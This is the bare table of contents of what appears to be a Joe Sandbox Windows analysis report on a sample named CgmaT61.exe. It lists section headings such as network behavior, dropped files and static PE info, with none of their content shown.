Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
CgmaT61.exe